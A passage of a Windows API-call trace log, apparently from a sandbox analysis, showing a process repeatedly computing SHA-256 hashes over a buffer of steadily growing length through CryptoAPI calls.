	[0208.020] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.020] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.020] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0xa00, dwFlags=0x0) returned 1
	[0208.020] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.020] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b0a48
	[0208.021] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b0a48, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b0a48, pdwDataLen=0x129364) returned 1
	[0208.021] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.021] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.021] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.021] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.021] CryptHashData (hHash=0x22b6840, pbData=0x275fc38, dwDataLen=0xa20, dwFlags=0x0) returned 1
	[0208.021] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.021] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b0a70
	[0208.021] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x26b0a70, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b0a70, pdwDataLen=0x129364) returned 1
	[0208.021] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0208.021] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.021] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.022] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.022] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0xa40, dwFlags=0x0) returned 1
	[0208.022] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.022] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b0a98
	[0208.022] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b0a98, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b0a98, pdwDataLen=0x129364) returned 1
	[0208.022] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.022] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.022] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.022] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.022] CryptHashData (hHash=0x22b6840, pbData=0x275fc38, dwDataLen=0xa60, dwFlags=0x0) returned 1
	[0208.022] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.022] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b0ac0
	[0208.022] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x26b0ac0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b0ac0, pdwDataLen=0x129364) returned 1
	[0208.022] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0208.022] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.022] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.023] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.023] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0xa80, dwFlags=0x0) returned 1
	[0208.023] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.023] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b0ae8
	[0208.023] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b0ae8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b0ae8, pdwDataLen=0x129364) returned 1
	[0208.023] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.023] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.023] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.023] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.023] CryptHashData (hHash=0x22b6840, pbData=0x275fc38, dwDataLen=0xaa0, dwFlags=0x0) returned 1
	[0208.023] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.023] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b0b10
	[0208.023] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x26b0b10, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b0b10, pdwDataLen=0x129364) returned 1
	[0208.023] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0208.023] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.023] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.024] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.024] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0xac0, dwFlags=0x0) returned 1
	[0208.024] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.024] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b0b38
	[0208.024] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b0b38, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b0b38, pdwDataLen=0x129364) returned 1
	[0208.024] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.024] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.024] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.024] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.024] CryptHashData (hHash=0x22b6840, pbData=0x275fc38, dwDataLen=0xae0, dwFlags=0x0) returned 1
	[0208.024] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.024] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b0b60
	[0208.024] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x26b0b60, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b0b60, pdwDataLen=0x129364) returned 1
	[0208.024] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0208.024] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.025] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.025] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.025] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0xb00, dwFlags=0x0) returned 1
	[0208.025] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.025] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b0b88
	[0208.025] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b0b88, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b0b88, pdwDataLen=0x129364) returned 1
	[0208.025] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.025] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.025] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.025] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.026] CryptHashData (hHash=0x22b6840, pbData=0x275fc38, dwDataLen=0xb20, dwFlags=0x0) returned 1
	[0208.026] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.026] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b0bb0
	[0208.026] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x26b0bb0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b0bb0, pdwDataLen=0x129364) returned 1
	[0208.026] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0208.026] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.026] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.026] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.026] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0xb40, dwFlags=0x0) returned 1
	[0208.026] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.026] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b0bd8
	[0208.026] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b0bd8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b0bd8, pdwDataLen=0x129364) returned 1
	[0208.026] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.026] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.026] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.027] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.027] CryptHashData (hHash=0x22b6840, pbData=0x275fc38, dwDataLen=0xb60, dwFlags=0x0) returned 1
	[0208.027] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.027] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b0c00
	[0208.027] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x26b0c00, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b0c00, pdwDataLen=0x129364) returned 1
	[0208.027] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0208.027] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.027] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.028] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.028] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0xb80, dwFlags=0x0) returned 1
	[0208.028] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.028] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b0c28
	[0208.028] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b0c28, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b0c28, pdwDataLen=0x129364) returned 1
	[0208.028] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.028] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.028] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.028] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.028] CryptHashData (hHash=0x22b6840, pbData=0x275fc38, dwDataLen=0xba0, dwFlags=0x0) returned 1
	[0208.028] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.028] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b0c50
	[0208.028] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x26b0c50, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b0c50, pdwDataLen=0x129364) returned 1
	[0208.028] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0208.028] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.028] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.029] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.029] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0xbc0, dwFlags=0x0) returned 1
	[0208.029] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.029] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b0c78
	[0208.029] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b0c78, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b0c78, pdwDataLen=0x129364) returned 1
	[0208.029] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.029] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.029] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.029] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.029] CryptHashData (hHash=0x22b6840, pbData=0x275fc38, dwDataLen=0xbe0, dwFlags=0x0) returned 1
	[0208.029] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.029] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b0ca0
	[0208.029] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x26b0ca0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b0ca0, pdwDataLen=0x129364) returned 1
	[0208.029] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0208.029] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.029] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.030] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.030] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0xc00, dwFlags=0x0) returned 1
	[0208.030] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.030] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b0cc8
	[0208.030] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b0cc8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b0cc8, pdwDataLen=0x129364) returned 1
	[0208.030] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.030] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.030] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.030] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.030] CryptHashData (hHash=0x22b6840, pbData=0x275fc38, dwDataLen=0xc20, dwFlags=0x0) returned 1
	[0208.030] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.030] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b0cf0
	[0208.030] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x26b0cf0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b0cf0, pdwDataLen=0x129364) returned 1
	[0208.030] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0208.030] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.031] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.031] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.031] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0xc40, dwFlags=0x0) returned 1
	[0208.031] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.031] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b0d18
	[0208.031] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b0d18, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b0d18, pdwDataLen=0x129364) returned 1
	[0208.031] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.031] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.031] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.031] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.031] CryptHashData (hHash=0x22b6840, pbData=0x275fc38, dwDataLen=0xc60, dwFlags=0x0) returned 1
	[0208.031] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.031] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b0d40
	[0208.031] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x26b0d40, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b0d40, pdwDataLen=0x129364) returned 1
	[0208.031] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0208.032] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.032] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.032] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.032] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0xc80, dwFlags=0x0) returned 1
	[0208.032] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.032] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b0d68
	[0208.032] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b0d68, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b0d68, pdwDataLen=0x129364) returned 1
	[0208.032] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.032] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.032] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.032] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.032] CryptHashData (hHash=0x22b6840, pbData=0x275fc38, dwDataLen=0xca0, dwFlags=0x0) returned 1
	[0208.032] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.032] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b0d90
	[0208.033] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x26b0d90, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b0d90, pdwDataLen=0x129364) returned 1
	[0208.033] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0208.033] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.033] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.033] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.033] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0xcc0, dwFlags=0x0) returned 1
	[0208.033] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.033] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b0db8
	[0208.033] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b0db8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b0db8, pdwDataLen=0x129364) returned 1
	[0208.033] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.033] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.033] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.033] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.033] CryptHashData (hHash=0x22b6840, pbData=0x275fc38, dwDataLen=0xce0, dwFlags=0x0) returned 1
	[0208.033] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.034] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b0de0
	[0208.034] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x2, pbData=0x26b0de0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b0de0, pdwDataLen=0x129364) returned 1
	[0208.034] CryptDestroyHash (hHash=0x22b6840) returned 1
	[0208.034] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.034] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.034] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.034] CryptHashData (hHash=0x22b6c00, pbData=0x275fc38, dwDataLen=0xd00, dwFlags=0x0) returned 1
	[0208.034] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0208.034] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b0e08
	[0208.034] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x26b0e08, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x26b0e08, pdwDataLen=0x129364) returned 1
	[0208.034] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0208.034] CryptReleaseContext (hProv=0x2258e0, dwFlags=0x0) returned 1
	[0208.034] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x2258e0) returned 1
	[0208.034] CryptCreateHash (in: hProv=0x2258e0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0208.034] CryptHashData (hHash=0x22b6840, pbData=0x275fc38, dwDataLen=0xd20, dwFlags=0x0) returned 1
	[0208.035] CryptGetHashParam (in: hHash=0x22b6840, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
